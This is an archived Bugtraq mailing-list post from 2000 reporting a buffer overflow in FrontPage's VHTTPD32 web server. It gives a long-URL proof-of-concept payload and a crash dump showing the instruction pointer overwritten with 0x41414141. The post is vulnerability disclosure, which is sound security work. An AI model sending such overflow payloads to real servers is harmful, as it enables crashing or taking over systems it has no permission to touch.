Bugtraq mailing list archives

Re: More vulnerabilities in FP

From: webmad () MAIL RU (Roman)
Date: Sat, 22 Apr 2000 22:16:18 +0200


Hello,

First remote FrontPage exploit?


How about this one:
<A HREF="http://server/AAAAAAAAAAAA<a">http://server/AAAAAAAAAAAA<a</A> lots of A>AAAAAA

FP will overflow and someone will see this message:

VHTTPD32 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:

Stack dump:
41414141 41414141 66204141 656c6961 6f662064 32312072
2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
6e207365 6520746f 74736978 00000000

Tested on FP 3.0.2.926. Maybe others?

Current thread:

Re: More vulnerabilities in FP .sozni (Apr 20)
- <Possible follow-ups>
- Re: More vulnerabilities in FP Thomas Dullien (Apr 21)
- Re: More vulnerabilities in FP Roman (Apr 22)
- Re: More vulnerabilities in FP Daniel Dočekal (Apr 24)
  - Re: More vulnerabilities in FP Ian McDonald (Apr 26)
  - ISS Security Advisory: Insecure file handling in IBM frcactrl program Aleph One (Apr 26)